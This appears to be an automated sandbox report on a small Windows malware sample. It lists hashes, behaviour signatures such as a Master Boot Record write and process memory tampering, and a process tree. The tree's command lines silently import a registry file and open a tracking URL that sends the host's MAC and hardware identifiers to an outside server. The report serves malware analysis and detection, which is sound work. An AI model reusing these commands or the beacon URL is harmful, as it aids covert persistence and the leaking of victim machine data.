Analysis

  • max time kernel
    0s
  • max time network
    33s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    31/10/2024, 14:49

General

  • Target

    835759aebbd9d2ac10b6e7ae25b7e8d3_JaffaCakes118.exe

  • Size

    60KB

  • MD5

    835759aebbd9d2ac10b6e7ae25b7e8d3

  • SHA1

    d47d1d378c9b20dc3ce2e5c202fa9f8478e06b98

  • SHA256

    02cd7c84b903401c79912c13872510517779077cf3b4dfb683e2d01b3a48fae2

  • SHA512

    3da4c02fe8d48336497ca4a0c1c8a29b9c081ac10cd6540948f2595268febb36de5fbd092a708a0173c624c24b1a129529786695ea462bca20e2cb53a47d3cf2

  • SSDEEP

    768:TED6ScJar0b01CamqZHKyKMB4Rn2iYkHj1WBw/N5bMzPRd/UIKJyFd/k:QcJar0O5m6eD1Wu07UuFdc

Malware Config

Signatures

  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Runs .reg file with regedit 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\835759aebbd9d2ac10b6e7ae25b7e8d3_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\835759aebbd9d2ac10b6e7ae25b7e8d3_JaffaCakes118.exe"
    1⤵
    • Writes to the Master Boot Record (MBR)
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4488
    • C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c regedit /s "C:\Users\Admin\AppData\Local\Temp\getback.reg"
      2⤵
      • System Location Discovery: System Language Discovery
      PID:752
      • C:\Windows\SysWOW64\regedit.exe
        regedit /s "C:\Users\Admin\AppData\Local\Temp\getback.reg"
        3⤵
        • Runs .reg file with regedit
        PID:1588
    • C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://union.wanwan.cc/Stat.ashx?Mac=CA65FB447FB&Hard=232138804165&ClientType=Home&Process=88&UserID=0017&Authen=758-727
      2⤵
      PID:3300
      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3300 CREDAT:17410 /prefetch:2
        3⤵
        PID:1520

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Temp\getback.reg

    Filesize

    1KB

    MD5

    626e2d76f5c328d57a3eff6a7f94d129

    SHA1

    210fd33fa005775b30a8fd40a065a2e788934216

    SHA256

    5d9ae4b62924d6da9c35305bfd0d61c893767b7113f8b2f239da02057f8bee6e

    SHA512

    629290bd5791a42327b3b70a68609c6b0b9114365be8579553e01e6cbc98996c0fab475b88c0dd80d34dcc325453401c6cce26fb70ed67a9cb08271a07fd85a1

  • memory/4488-0-0x0000000000400000-0x000000000040F000-memory.dmp

    Filesize

    60KB

  • memory/4488-13-0x0000000000400000-0x000000000040F000-memory.dmp

    Filesize

    60KB